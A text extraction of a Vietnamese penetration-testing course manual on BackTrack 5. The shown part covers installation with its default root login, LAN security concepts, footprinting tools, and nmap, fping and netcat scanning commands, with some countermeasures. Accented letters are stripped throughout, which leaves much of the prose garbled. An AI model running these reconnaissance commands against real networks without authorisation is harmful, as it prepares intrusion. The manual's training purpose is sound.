athena-su dung backtrack 5 de khai thac lo hong mang.pdf
TRANSCRIPT
-
1
TI LIU HNG DN V S DNG
BACKTRACK 5 KHAI THC L HNG
MNG TI TRUNG TM ATHENA
-
2
LI M U
u tin, xin gi li cm n chn thnh n thy V Thng Gim c
Trung tm o to v qun tr mng an ninh mng Athena v thy L nh Nhn
nhit tnh gip hon thnh ti liu ny.
Cho gi li cm n n cc anh ch nhn vin t vn nhn vin h tr k
thut ti Trung tm o to v qun tr mng Athena h tr v to iu kin hon
thnh d n an nin mng ng thi hn c giao.
Trn trng!
Nhm thc hin
Nguyn Sn Kh
Tn Pht
Nguyn Cao Thng
-
3
MC LC
Chng M u : GII THIU V BACKTRACK 5 ..................................... 6
I. Gii thiu ................................................................................................. 6
II. Mc ch .................................................................................................. 6
III. Ngun ti Backtrack : .............................................................................. 7
IV. Ci t ...................................................................................................... 8
1. Live DVD ............................................................................................. 8
2. Install .................................................................................................... 8
Chng 1: TM HIU VN BO MT MNG LAN ............................ 16
I. Gii thiu ............................................................................................... 16
II. Vn bo mt h thng v mng ......................................................... 16
1. Cc vn d chung v bo mt h thng v mng ............................... 16
2. Mt s khi nim v lch s bo mt h thng ................................... 16
3. Cc loi l hng bo mt v phng thc tn cng mng ch yu ... 17
Chng 2: FOOTPRINTING ........................................................................... 21
I. Gii thiu v Footprinting ..................................................................... 21
II. Cc bc thc hin Footprinting ........................................................... 21
1. Xc nh vng hot ng ca chng ta .............................................. 21
2. Cc thng tin c sn cng khai ........................................................... 21
3. Whois v DNS Enumeration .............................................................. 21
4. Thm d DNS ..................................................................................... 22
5. Thm d mng .................................................................................... 22
III. Phng php thc hin Footprinting ..................................................... 22
IV. Cc cng c thc hin Footprinting: ..................................................... 25
1. Sam Spade .......................................................................................... 25
2. Super Email Spider ............................................................................. 26
3. VitualRoute Trace .............................................................................. 27
4. Maltego ............................................................................................... 27
Chng 3: SCANNING ................................................................................... 28
-
4
I. Gii thiu ............................................................................................... 28
II. Chng nng ............................................................................................ 28
1. Xc nh h thng c ang hot ng hay khng? ............................ 28
2. Xc nh cc dch v ang chy hoc ang lng nghe. ...................... 31
3. Xc nh h iu hnh ........................................................................ 37
Chng 4: ENUMERATION .......................................................................... 39
I. Enumeration l g? ................................................................................. 39
II. Banner Grabbing .................................................................................... 39
III. Enumerating cc dch v mng .............................................................. 39
1. Http fingerprinting .............................................................................. 39
2. DNS Enumeration .............................................................................. 42
3. Netbios name ...................................................................................... 44
Chng 5: PASSWORD CRACKING ............................................................ 45
I. Gii Thiu .............................................................................................. 45
II. Cc K Thut Password Cracking ......................................................... 45
1. Dictionary Attacks/Hybrid Attacks .................................................... 45
2. Brute Forcing Attacks ........................................................................ 45
3. Syllable Attacks/Pre-Computed Hashes ............................................. 45
III. Cc Kiu Tn Cng Thng Gp .......................................................... 45
1. Active Password Cracking ................................................................. 45
2. Passive Password Cracking ................................................................ 46
3. Offline Password Cracking ................................................................ 46
IV. Cc cng c Password Cracking ............................................................ 46
1. Hydra .................................................................................................. 46
2. Medusa ............................................................................................... 48
V. Password Cracking Trn Cc Giao Thc .............................................. 51
1. HTTP (HyperText Tranfer Protocol) ................................................. 51
2. SSH (Secure Shell) ............................................................................. 58
3. SMB (Server Message Block) ............................................................ 61
4. RDP (Remote Desktop Protocol) ....................................................... 64
-
5
Chng 6: SYSTEM HACKING .................................................................... 67
I. GII THIU V METASPLOIT .......................................................... 67
1. Gii thiu ............................................................................................ 67
2. Cc thnh phn ca Metasploit .......................................................... 67
3. S dng Metasploit Framework ......................................................... 67
4. Gii thiu Payload Meterpreter .......................................................... 68
5. Cch phng chng .............................................................................. 70
II. Li MS10-046 (2286198) ...................................................................... 70
1. Gii thiu ............................................................................................ 70
2. Cc bc tn cng: ............................................................................. 71
3. Cch phng chng .............................................................................. 79
III. Li BYPASSUAC ................................................................................. 80
1. Gii thiu ............................................................................................ 80
2. Cc bc tn cng .............................................................................. 80
3. Cch phng chng .............................................................................. 85
Chng 7: WEB HACKING VI DVWA ...................................................... 86
I. Gii thiu ............................................................................................... 86
II. Hng dn ci t DVWA trn Backtrack ............................................ 86
1. Ti v ci t XAMPP ........................................................................ 86
2. Ti v ci t DVWA ......................................................................... 88
III. Cc k thut tn cng trn DVWA ......................................................... 92
1. XSS (Cross-Site Scripting) ................................................................. 92
2. SQL Injection ................................................................................... 100
TI LIU THAM KHO ................................................................................ 106
-
6
Chng M u : GII THIU V BACKTRACK 5
I. Gii thiu
Backtrack l mt bn phn phi dng Live DVD ca Linux, c pht trin th
nghim thm nhp. Trong cc nh dng Live DVD, chng ta s dng c th
Backtrack trc tip t a DVD m khng cn ci n vo my ca chng ta. Backtrack
cng c th c ci t vo cng v s dng nh mt h iu hnh. Backtrack l s
hp nht gia 3 bn phn phi khc nhau ca Linux v thm nhp th nghim -
IWHAX, WHOPPIX, v Auditor. Trong phin bn hin ti ca n (5), Backtrack c
da trn phin bn phn phi Linux Ubuntu 11.10. Tnh n ngy 19 thng by nm
2010, Backtrack 5 c ti v ca hn 1,5 triu ngi s dng. Phin bn mi nht
l Backtrack 5 R2
II. Mc ch
Cng c Backtrack c lch s pht trin kh lu qua nhiu bn linux khc
nhau. Phin bn hin nay s dng bn phn phi Slackware linux (Tomas M.
(www.slax.org)). Backtrack lin tc cp nht cc cng c, drivers,... hin ti Backtrack
c trn 300 cng c phc v cho vic nghin cu bo mt. Backtrack l s kt hp
gia 2 b cng c kim th bo mt rt ni ting l Whax v Auditor.
Backtrack 5 cha mt s cng c c th c s dng trong qu trnh th
nghim thm nhp ca chng ta. Cc cng c kim tra thm nhp trong Backtrack 5,0
c th c phn loi nh sau:
Information gathering: loi ny c cha mt s cng c c th c s
dng c c thng tin lin quan n mt mc tiu DNS, nh tuyn, a
ch e-mail, trang web, my ch mail, v nh vy. Thng tin ny c thu
thp t cc thng tin c sn trn Internet, m khng cn chm vo mi
trng mc tiu.
Network mapping: loi ny cha cc cng c c th c s dng kim
tra cc host ang tn ti, thng tin v OS, ng dng c s dng bi mc
tiu, v cng lm portscanning.
Vulnerability identification: Trong th loi ny, chng ta c th tm thy cc
cng c qut cc l hng (tng hp) v trong cc thit b Cisco. N cng
cha cc cng c thc hin v phn tch Server Message Block (SMB) v
Simple Network Management Protocol (SNMP).
Web application analysis: loi ny cha cc cng c c th c s dng
trong theo di, gim st cc ng dng web
-
7
Radio network analysis: kim tra mng khng dy, bluetooth v nhn
dng tn s v tuyn (RFID), chng ta c th s dng cc cng c trong th
loi ny.
Penetration: loi ny cha cc cng c c th c s dng khai thc cc
l hng tm thy trong cc my tnh mc tiu
Privilege escalation: Sau khi khai thc cc l hng v c truy cp vo cc
my tnh mc tiu, chng ta c th s dng cc cng c trong loi ny
nng cao c quyn ca chng ta cho cc c quyn cao nht.
Maintaining access: Cng c trong loi ny s c th gip chng ta trong
vic duy tr quyn truy cp vo cc my tnh mc tiu. Chng ta c th cn
c c nhng c quyn cao nht trc khi cc chng ta c th ci t
cng c duy tr quyn truy cp
Voice Over IP (VOIP): phn tch VOIP chng ta c th s dng cc cng
c trong th loi ny
Digital forensics: Trong loi ny, chng ta c th tm thy mt s cng c c
th c s dng lm phn tch k thut nh c c hnh nh a cng,
cu trc cc tp tin, v phn tch hnh nh a cng. s dng cc cng c
cung cp trong th loi ny, chng ta c th chn Start Backtrack Forensics
trong trnh n khi ng. i khi s i hi chng ta phi gn kt ni b a
cng v cc tp tin trao i trong ch ch c bo tn tnh ton vn.
Reverse engineering: Th loi ny cha cc cng c c th c s dng
g ri chng trnh mt hoc tho ri mt tp tin thc thi.
III. Ngun ti Backtrack :
Chng ta c th ti bn Backtrack 5 ti a ch: www.backtrack-linux.org/downloads/
C bn cho Vmware v file ISO
-
8
IV. Ci t
1. Live DVD
Nu chng ta mun s dng Backtrack m khng cn ci n vo cng, chng
ta c th ghi tp tin nh ISO vo a DVD, v khi ng my tnh ca chng ta vi
DVD. Backtrack sau s chy t a DVD. Li th ca vic s dng Backtrack l
mt DVD Live l n l rt d dng lm v chng ta khng cn phi gy ri vi cu
hnh my hin ti ca chng ta.
Tuy nhin, phng php ny cng c mt s nhc im. Backtrack c th
khng lm vic vi phn cng, v thay i cu hnh no c thc hin trn phn
cng lm vic s khng c lu vi a DVD Live. Ngoi ra, n l chm, v my
tnh cn phi ti cc chng trnh t a DVD.
2. Install
a) Ci t trong my tht:
Chng ta cn chun b mt phn vng ci t Backtrack. Sau chy
Backtrack Live DVD. Khi gp mn hnh login
Ta s dng username l root, pass l toor. Sau vo ch ha, ta g
startx v ta s vo ch ha ca Backtrack 5.
ci t Backtrack 5 n a cng ta chn tp tin c tn install.sh trn desktop
v tin hnh ci t. Tuy nhin, nu khng th tm thy tp tin, chng ta c th s dng
ubiquity ci t. s dng ubiquity, ta m Terminal g ubiquity.
-
9
Sau ca s ci t s hin th. Sau tr li 1 s cu hi nh thnh ph chng ta
ang sng, keyboard layout, phn vng a ci t, Sau tin hnh ci t.
b) Ci t trong my o:
im thun li l ta khng cn chun b mt phn vng cho Backtrack, v s
dng ng thi mt OS khc. Khuyt im l tc chm, khng dng c wireless
tr USB wireless.
Ta c th c th s dng file VMWare c cung cp bi BackTrack. T y
chng ta c BackTrack trn my o tht d dng v nhanh chng. Cu hnh trong file
VMWare l memory 768MB, hardisk :30GB, Network:NAT. s dng c card
mng tht, ta phi chn Netword l Briged
Di y lm mt s hnh nh khi ci BackTrack trn my o VMWare
To mt my o mi v cho ia BackTrack vo.
-
10
Giao din khi ng ca BackTrack
-
11
G startx vo ch ha trong BackTrack
ci t, click chn vo file Install BackTrack trn mn hnh Desktop
-
12
Chn ngn ng, chn Forward tip tc
Chn ni ca chng ta, chn Forward tip tc
-
13
Chn ngn ng bn phm, chn Forward tip tc
Chn phn vng ci.
-
14
Nhn Install bt u ci
Qu trnh ci bt u.
-
15
Sau khi hon tt, ch vic khi ng li l xong.
-
16
Chng 1: TM HIU VN BO MT MNG LAN
I. Gii thiu
An ninh an ton mng my tnh hon ton l vn con ngi, do vic a
ra mthnh lang php l v cc quy nguyn tc lm vic c th l cn thit. y,
hnhlang php l c th gm: cc iu khon trong b lut ca nh nc, cc vn
bndi lut,... Cn cc quy nh c th do tng t chc t ra cho ph hp vi
tngc im ring. Cc quy nh c th nh: quy nh v nhn s, vic s dng
my,s dng phn mm,... V nh vy, s hiu qu nht trong vic m bo an ninh
anton cho h thng mng my tnh mt khi ta thc hin trit gii php v
chnhsch con ngi.Tm li, vn an ninh an ton mng my tnh l mt vn
ln, n yucu cn phi c mt gii php tng th, khng ch phn mm, phn cng
my tnhm n i hi c vn chnh sch v con ngi. V vn ny cn phi
cthc hin mt cch thng xuyn lin tc, khng bao gi trit c v n
lunny sinh theo thi gian. Tuy nhin, bng cc gii php tng th hp l, c bit
lgii quyt tt vn chnh sch v con ngi ta c th to ra cho mnh s an
tonchc chn hn.
II. Vn bo mt h thng v mng
1. Cc vn d chung v bo mt h thng v mng
c im chung ca mt h thng mng l c nhiu ngi s dng chung
v phn tn v mt a l nn vic bo v ti nguyn (mt mt hoc s dng khng
hp l) phc tp hn nhiu so vi vic mi trng mt my tnh n l, hoc
mtngi s dng.Hot ng ca ngi qun tr h thng mng phi m bo cc
thng tin trnmng l tin cy v s dng ng mc ch, i tng ng thi m bo
mng hotng n nh khng b tn cng bi nhng k ph hoi. Nhng trn thc t
l khng mt mng no m bo l an ton tuyt i, mth thng d c bo v
chc chn n mc no th cng c lc b v hiu ha binhng k c xu.
2. Mt s khi nim v lch s bo mt h thng
a) i tng tn cng mng (intruder)
i tng l nhng c nhn hoc t chc s dng nhng kin thc v
mngv cc cng c ph hoi (gm phn cng hoc phn mm) d tm cc im
yuv cc l hng bo mt trn h thng, thc hin cc hot ng xm nhp v
chimot ti nguyn tri php.Mt s i tng tn cng mng nh:Hacker: l nhng
k xm nhp vo mng tri php bng cch s dng cccng c ph mt khu hoc
khai thc cc im yu ca thnh phn truy nhp trn hthngMasquerader : L nhng
1X42FHighlight
1X42FHighlight
-
17
k gi mo thng tin trn mng nh gi mo a chIP, tn min, nh danh ngi
dngEavesdropping: L nhng i tng nghe trm thng tin trn mng, s
dngcc cng c Sniffer, sau dng cc cng c phn tch v debug ly c
ccthng tin c gi tr. Nhng i tng tn cng mng c th nhm nhiu mc ch
khc nhau nhn cp cc thng tin c gi tr v kinh t, ph hoi h thng mng c ch
nh, hocc th l nhng hnh ng v thc
b) Cc l hng bo mt
Cc l hng bo mt l nhng im yu trn h thng hoc n cha
trongmt dch v m da vo k tn cng c th xm nhp tri php vo h thng
thc hin nhng hnh ng ph hoi chim ot ti nguyn bt hp php.C nhiu
nguyn nhn gy ra nhng l hng bo mt: c th do li ca bnthn h thng, hoc
phn mm cung cp hoc ngi qun tr yu km khng hiusu v cc dch v cung
cpMc nh hng ca cc l hng ti h thng l khc nhau. C l hngch nh
hng ti cht lng dch v cung cp, c l hng nh hng ti ton b hthng hoc
ph hy h thng
c) Chnh sch bo mt
Chnh sch bo mt l tp hp cc quy tc p dng cho nhng ngi
thamgia qun tr mng, c s dng cc ti nguyn v cc dch v mng.
i vi tng trng hp phi c chnh sch bo mt khc nhau. Chnh
sch bo mt gip ngi s dng bit trch nhim ca mnh trong vic
bo v cc tinguyn trn mng, ng thi cn gip cho nh qun tr mng thit lp
cc bin phpm bo hu hiu trong qu trnh trang b, cu hnh v kim sot hot
ng ca hthng v mng.
3. Cc loi l hng bo mt v phng thc tn cng mng ch yu
a) Cc loi l hng
C nhiu cc t chc tin hnh phn loi cc dng l hng c bit.
Theo b quc phng M cc loi l hng c phn lm ba loi nh sau:
L hng loi C
Cho php thc hin cc hnh thc tn cng theo DoS(Denial of Services- T
chi dch v) Mc nguy him thp ch nh hng ticht lng dch v, lm ngng
tr, gin on h thng, khng lm ph hng d liuhoc t c quyn truy cp bt
hp php.DoS l hnh thc tn cng s dng cc giao thc tng Internet trong bgiao
thc TCP/IP lm h thng ngng tr dn n tnh trng t chi ngi sdng hp
php truy nhp hay s dng h thng.Cc dch v c l hng cho php cc cuc tn
cng DoS c th c nngcp hoc sa cha bng cc phin bn mi hn ca cc nh
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
-
18
cung cp dch v. Hinnay cha c mt bin php hu hiu no khc phc tnh
trng tn cng kiu nyv bn thn thit k tng Internet (IP) ni ring v b giao
thc TCP/IP ni chung n cha nhng nguy c tim tang ca cc l hng loi ny.
L hng loi B:
Cho php ngi s dng c thm cc quyn trn h thng m khng cn kim
tra tnh hp l dn n mt mt thng tin yu cu cn bo mt.L hng ny thng c
trong cc ng dng trn h thng . C mc nguy him l trung bnh.L hng loi B
ny c mc nguy him hn l hng loi C. Cho phpngi s dng ni b c th
chim c quyn cao hn hoc truy nhpkhnghp php.
Nhng l hng loi ny thng xut hin trong cc dch v trn h thng. Ng
s dng local c hiu l ngi c quyn truy nhp vo h thng vimt s quyn
hn nht nh. Tm hiu vn bo mt mng LAN. Mt dng khc ca l hng loi B
xy ra vi cc chng trnh vit bng m ngun C. Nhng chng trnh vit bng m
ngun C thng s dng mt vngm, mt vng trong b nh s dng lu tr d
liu trc khi x l. Ngi lptrnh thng s dng vng m trong b nh trc khi
gn mt khong khng gian b nh cho tng khi d liu. V d khi vit chng trnh
nhp trng tn ngi sdng quy nh trng ny di 20 k t bng khai bo:Char
first_name [20]; Khai bo ny cho php ngi s dng nhp ti a 20k t. Khi nhp
d liu ban u d liu c lu vng m. Khi ngi s dngnhp nhiu hn 20 k
t s trn vng m. Nhng k t nhp tha s nm ngoivng m khin ta khng th
kim sot c. Nhng i vi nhng k tn cngchng c th li dng nhng l hng
ny nhp vo nhng k t c bit thcthi mt s lnh c bit trn h thng.
Thng thng nhng l hng ny c lidng bi nhng ngi s dng trn h
thng t c quyn root khng hp l. hn ch c cc l hng loi B phi
kim sot cht ch cu hnh h thng vcc chng trnh.
L hng loi A
Cho php ngi ngoi h thng c th truy cp bt hp phpvo h thng. C
th lm ph hu ton b h thng. Loi l hng ny c mc rtnguy him e da
tnh ton vn v bo mt ca h thng. Cc l hng ny thngxut hin nhng h
thng qun tr yu km hoc khng kim sot c cu hnhmng. Nhng l hng loi
ny ht sc nguy him v n tn ti sn c trn phnmm s dng, ngi qun tr
nu khng hiu su v dch v v phn mm s dngc th b qua im yu ny. V
vy thng xuyn phi kim tra cc thng bo cacc nhm tin v bo mt trn mng
pht hin nhng l hng loi ny. Mt lotcc chng trnh phin bn c thng s
dng c nhng l hng loi A nh: FTP,Gopher, Telnet, Sendmail, ARP, finger.
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
-
19
b) Cc hnh thc tn cng mng ph bin
Scanner
Scanner l mt chng trnh t ng r sot v pht hin nhng im yu v
bo mt trn mt trm lm vic cc b hoc mt trm xa. Mt k ph hoi s dng
chng trnh Scanner c th pht hin ra nhng l hng v bo mt trn mtServer d
xa.C ch hot ng l r sot v pht hin nhng cng TCP/UDP c s dng trn
h thng cn tn cng v cc dch v s dng trn h thng . Scanner ghi li nhng
p ng trn h thng t xa tng ng vi dch v m n pht hinra. T n c th
tm ra im yu ca h thng. Nhng yu t mt Scanner hot ng nh sau:Yu
cu thit b v h thng: Mi trng c h tr TCP/IPH thng phi kt ni vo mng
Internet.Cc chng trnh Scanner c vai tr quan trng trong mt h thng bo mt,v
chng c kh nng pht hin ra nhng im yu km trn mt h thng mng.
Password Cracker
L mt chng trnh c kh nng gii m mt mt khu c m hohoc c
th v hiu ho chc nng bo v mt khu ca mt h thng.Mt s chng trnh ph
kho c nguyn tc hot ng khc nhau. Mt schng trnh to ra danh sch cc t
gii hn, p dng mt s thut ton m ho t kt qu so snh vi Password m ho
cn b kho to ra mt danh sch khctheo mt logic ca chng trnh.Khi thy
ph hp vi mt khu m ho, k ph hoi c c mt khudi dng text .
Mt khu text thng thng s c ghi vo mt file.Bin php khc phc i vi
cch thc ph hoi ny l cn xy dng mtchnh sch bo v mt khu ng n.
Sniffer
Sniffer l cc cng c (phn cng hoc phn mm)bt cc thng tin
luchuyn trn mng v ly cc thng tin c gi tr trao i trn mng.Sniffer c th
bt c cc thng tin trao i gia nhiu trm lm vic vinhau. Thc hin bt cc
gi tin t tng IP tr xung. Giao thc tng IP c nhngha cng khai, v cu trc
cc trng header r rng, nn vic gii m cc gi tin ny khng kh khn.
Mc ch ca cc chng trnh sniffer l thit lp ch promiscuous(mode
dng chung) trn cc card mng ethernet - ni cc gi tin trao i trongmng - t
"bt" c thng tin.Cc thit b sniffer c th bt c ton b thng tin trao i trn
mng lda vo nguyn tc broadcast (qung b) cc gi tin trong mng Ethernet.Tuy
nhin vic thit lp mt h thng sniffer khng phi n gin v cn phi xm nhp
c vo h thng mng v ci t cc phn mm sniffer.ng thi cc chng
trnh sniffer cng yu cu ngi s dng phi hiusu v kin trc, cc giao thc
mng.Vic pht hin h thng b sniffer khng phi n gin, v sniffer hot ng
tng rt thp, v khng nh hng ti cc ng dng cng nh cc dch v hthng
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
-
20
cung cp.Tuy nhin vic xy dng cc bin php hn ch sniffer cng khng qu
khkhn nu ta tun th cc nguyn tc v bo mt nh:
Khng cho ngi l truy nhp vo cc thit b trn h thng
Qun l cu hnh h thng cht ch
Thit lp cc kt ni c tnh bo mt cao thng qua cc c ch m ho.
Trojans
Trojans l mt chng trnh chy khng hp l trn mt h thng. Vi vaitr
nh mt chng trnh hp php. Trojans ny c th chy c l do cc chngtrnh
hp php b thay i m ca n thnh m bt hp php.V d nh cc chng trnh
virus l loi in hnh ca Trojans. Nhngchng trnh virus thng che du cc on
m trong cc chng trnh s dng hp php. Khi nhng chng trnh ny c kch
hot th nhng on m n du sthc thi v chng thc hin mt s chc nng m
ngi s dng khng bit nh: ncp mt khu hoc copy file m ngi s dng nh
ta thng khng hay bit.Mt chng trnh Trojans s thc hin mt trong nhng cng
vic sau:
Thc hin mt vi chc nng hoc gip ngi lp trnh ln n pht hinnhng
thng tin quan trng hoc nhng thng tin c nhn trn mt h thng hocch trn mt
vi thnh phn ca h thng .
Che du mt vi chc nng hoc l gip ngi lp trnh pht hin nhngthng
tin quan trng hoc nhng thng tin c nhn trn mt h thng hoc ch trnmt vi
thnh phn ca h thng. Ngoi ra cn c cc chng trnh Trojan c th thc hin
c c hai chc nngny. C chng trnh Trojan cn c th ph hy h thng bng
cch ph hoi ccthng tin trn cng. Nhng ngy nay cc Trojans kiu ny d dng
b pht hin vkh pht huy c tc dng.Tuy nhin c nhng trng hp nghim
trng hn nhng k tn cng to ranhng l hng bo mt thng qua Trojans v k tn
cng ly c quyn root trnh thng v li dng quyn ph hy mt phn
hoc ton b h thng hocdng quyn root thay i logfile, ci t cc chng
trnh trojans khc m ngiqun tr khng th pht hin c gy ra mc nh
hng rt nghim trng vngi qun tr ch cn cch ci t li ton b h thng.
1X42FHighlight
-
21
Chng 2: FOOTPRINTING
I. Gii thiu v Footprinting
L mt k thut tm kim thng tin v mt danh nghip, c nhn hay t
chc.
Mt trong 3 giai on cn phi lm thc hin mt cuc tn cng.
Mt k tn cng dnh 90% thc hin vic thu thp v tim kim
thng tin v 10% thc hin tn cng.
Kt qu ca qu trnh Footprinting l ly c thng tin c bn ca mc
tiu tn cng: Tn, a ch cng ty, website, cc thnh vin trong cng ty,
s mng,
Cc thng tin cn tm kim:
Internet: Domain, Network blocks, IP, TCP hay UDP, System
Enumeration, ACLs, IDSes,
Intranet
Remote access: Remote system type,
Extranet: Connection origination and destination,
II. Cc bc thc hin Footprinting
Bao gm cc bc sau:
1. Xc nh vng hot ng ca chng ta
Th u tin trong kinh doanh l xc nh vng hot ng ca cc hot ng
footprinting ca chng ta. N c th l mt nhim v nn lng xc nh tt c cc
thc th trong mt t chc no . Tuy nhin, hacker chng thng cm cho cuc chin
ca chng ta. H khai thc cc im yu trong bt c cc biu mu no. Chng ta
khng mun hacker bit nhiu v tnh trng bo mt ca chng ta.
2. Cc thng tin c sn cng khai
Lng thng tin m n sn sng sn c cho chng ta, t chc chng ta v bt c
nhng g chng ta c th hnh dung th chng l g thiu tnh tuyt vi.
Nhng thng tin c th bao gm: trang web ca cng ty; cc t chc quan h; v
tr ta lc; thng tin chi tit v nhn vin; cc s kin hin ti; cc chnh sch bo mt
v s ring t.
3. Whois v DNS Enumeration
Xem chi tit thng tin v a ch IP, name server, dns server
1X42FHighlight
1X42FHighlight
1X42FHighlight
-
22
4. Thm d DNS
Sau khi xc nh tt c cc domain c lin quan, chng ta bt u truy vn
DNS. DNS l mt c s d liu phn tn dng nh x cc a ch IP thnh
hostname. Nu DNS khng c cu hnh mt cch bo mt, rt c kh nng ly c
cc thng tin bi l t t chc.
5. Thm d mng
By gi th chng ta xc nh c cc mng tim nng, chng ta c th xc
nh m hnh mng cng nh ng truy cp c kh nng vo mng
III. Phng php thc hin Footprinting
C 2 phng php thc Footprinting:
Active Footprinting: lin h trc tip vi mc tiu, tm hiu thng tin
cn thit
Passive Footprinting: Tm kim thng qua cc bi bo, trang web,
hoc t cc i th mc tiu,
Website: www.google.com ,
http://whois.domaintools.comwww.whois.net , www.tenmien.vn ,
www.arcchive.org ,
1X42FHighlight
1X42FHighlight
1X42FHighlight
1X42FHighlight
-
23
Whois : athena.com.vn
-
24
Tenmien.vn
-
25
Archive: http://www.microsoft.com
IV. Cc cng c thc hin Footprinting:
Sam Spade, Super email spider, VitualRoute Trace, Google Earth, Whois, Site
Digger, Maltego,
1. Sam Spade
Cho php ngi s dng c th thc hin cc hnh ng: Ping, Nslookup,
Whois, Traceroute,
1X42FHighlight
1X42FHighlight
-
26
2. Super Email Spider
Tm kim thng tin v a ch email ca c quan t chc s dng Search
Engine: Google, Lycos, iWon, Exiter, Hotbot, MSN, AOL,
1X42FHighlight
-
27
3. VitualRoute Trace
Hin th cc ng ni kt, a ch, khu vc ng kt ni i qua.
4. Maltego
L cng c dng pht hin cc lin kt gia: Ngi s dng, c quan, t
chc, website, domain, di mng, a ch IP,
1X42FHighlight
-
28
Chng 3: SCANNING
I. Gii thiu
Nu footprinting l vic xc nh ngun thng tin ang u th scanning l
vic tm ra tt c cc cnh ca xm nhp vo ngun thng tin . Trong qu trnh
footprinting, chng ta t c danh sch dy mng IP v a ch IP thng qua
nhiu k thut khc nhau bao gm whois v truy vn ARIN. K thut ny cung cp
cho nh qun tr bo mt cng nh hacker nhiu thng tin co gi tr v mng ch, dy
IP, DNS servers v mail servers. Trong chng ny, chng ta s xc nh xem h
thng no ang lng nghe trn giao thng mng v c th bt c qua vic s dng
nhiu cng c v k thut nh ping sweeps, port scan. Chng ta c th d dng vt
tng la bng tay (bypass firewalls) scan cc h thng gi s nh n ang b kha
bi chnh sch trch lc (filtering rules).
II. Chng nng
1. Xc nh h thng c ang hot ng hay khng?
Mt trong nhng bc c bn lp ra mt mng no l ping sweep trn mt
dy mng v IP xc nh cc thit b hoc h thng c ang hot ng hay khng.
Ping thng c dng gi cc gi tin ICMP ECHO ti h thng ch v c gng
nhn c mt ICMP ECHO REPLY bit h thng ang hot ng. Ping c th
c chp nhn xc nh s lng h thng cn sng c trong mng trong mng
va v nh ( Lp C c 254 v B c 65534 a ch) v chng ta c th mt hng gi,
hng ngy hon thnh cho nhnh mng lp A 16277214 a ch.
a) Netword Ping Sweeps
Netword pinging l hnh ng gi cc loi ca giao thng mng ti ch v
phn tch kt qu. Pinging s dng ICMP (Internet Control Message Protocol). Ngoi
ra, n cn s dng TCP hoc UDP tm host cn sng.
thc hin ICMP ping sweep, ta c th s dng fping, nmap,.
Fping a g 192.168.10.1 192.168.10.10
-a hin thi host ang sng: alive
-g dy a ch: 192.168.10.0/24 or nh trn
1X42FHighlight
1X42FHighlight
-
29
Nmap sP PE 192.168.10.0/24
-sP: ping scan
-PE: ping echo
-
30
Phng chng: chng ta c th dng pingd gi tt c cc giao thng mng
ICMP ECHO v ICMP ECHO REPLY cp host. im ny t
c bng cch g b s h tr ca vic x l ICMP ECHO t nhn h
thng. V mt c bn, n cung cp mt c ch iu khin truy cp mc
h thng.
b) ICMP query
Ping sweeps (or ICMP ECHO packets) c th ni ch l nh u ca tng
bng khi ni n thng tin ICMP v mt h thng. chng ta c th thu thp nhiu loi
thng tin c gi tr n gin bng cch cc gi tin ICMP. Chng ta c th yu cu mt
n mng ca mt thit b no vi Address Mask Request. Mt n mng rt quan
trng v chng ta c th xc nh c tt c a ch ca ch, bit c gatewate mt
nh, a ch broadcast. Nh vo gateway mc nh, chng ta c th tn cng router.
Vi a ch broadcast. Nhng khng phi tt c cc router no cng h tr Time v
Netmask.
Phng chng: Kha loi ICMP m cung cp thng tin ti router bin
(router i ra ISP). gim ti mc thiu, chng ta nn dng access list
(ACLs):
o Access-list 101 deny icmp any any 13 // yu cu timestamp
o Access-list 101 deny icmp any any 17 // yu cu address mask
-
31
2. Xc nh cc dch v ang chy hoc ang lng nghe.
a) Port Scanning
Port scanning l qu trnh gi cc gi tin ti cng TCP v UDP trn h
thng ch xc nh dch v no ang chy hoc trong tnh trng ang lng nghe.
Vic xc nh ang lng nghe l rt quan trng xc nh cc dch v ang chy.
Thm vo , chng ta c th xc nh loi v phin bn h iu hnh ang chy v
ng dng ang x dng.
b) Cc Loi Scan
Trc khi thc hin port scanning, chng ta nn im qua mt s cch thc
qut sn c:
TCP Connect scan: loi ny kt ni ti cng ch v thc hin y
quy trnh bt tay ba bc (SYN, SYN/ACK, ACK). Tuy nhin iu ny
th d dng b pht hin bi h thng ch. N s dng li gi h thng
thay cho cc gi tin sng (raw packets) v thng c s dng bi
nhng ngi dng Unix khng c quyn.V SYN Scan khng th thc
hin c.
TCP SYN scan: n khng to ra mt kt ni ti ngun m ch gi gi
tin SYN(bc u tin trong ba bc to kt ni) ti ch. Nu a gi tin
SYN/ACK c tr v th chng ta bit c cng ang lng nghe.
Ngc li, nu nhn c RST/ACK th cng khng lng nghe. K
thut ny kh b pht hin hn l TCP connect v n khng lu li
-
32
thng tin my tnh ch. Tuy nhin, mt trong nhng nhc im ca
k thut ny l c th to ra iu kin t chi dch v DoS nu c qu
nhiu kt ni khng y c to ra. V vy, k thut ny l an ton
nu khng c qu nhiu kt ni nh trn c to ra.
TCP ACK Scan: k thut ny c dng vch ra cc quy tt thit lp
tng la. n c th gip xc nh xem tng la l trnh trch lc cc
gi tin n gin cho php to kt ni hay l trnh trch lc nng cao.
Tuy nhin n khng th phn bit c cng no open hay closed.
TCP Windows Scan: Ging vi ACK Scan, im khc l n c th pht
hin cng open vi closed.
UDP Scan: k thut ny gi mt gi tin UDP ti cng ch. Nu cng
ch tr li vi thng ip ICMP port unreachable th cng closed.
Nu khng nhn c thng ip trn th cng trn ang m. Tuy
nhin, UDP scan l mt qu trnh rt chp nu nh chng ta c gng
scan mt thit b no m c p chnh sch trch lc gi tin mnh.
TCP FIN, XMAS, NULL: chng chuyn nghip trong vic ln lt vt
tng la khm ph cc h thng pha sau. Tuy nhin, chng li
ph thuc nhiu vo cch x l ca h thng ch m(in hnh l
Windows) th khng c biu hin g.
c) Xc nh cc dch v TCP v UDP ang chy
Strobe: c tin cy cao, tuy nhin ch h tr TCP, khng h tr UDP
-
33
Netcat l mt tin ch mng Unix n gin tnh nng c v ghi d liu
qua kt ni mng, s dng giao thc TCP / IP.N c thit k nh l
mt cng c ng tin cy "back-end" c th c s dng trc tip hoc
d dng iu khin bi cc chng trnh v cc script khc. ng thi,
n l cng c g li mng vi nhiu tnh nng v cng c thm d.
Nc v z w2 192.168.10.102 1-4000
-v: xut chi tit ra mn hnh
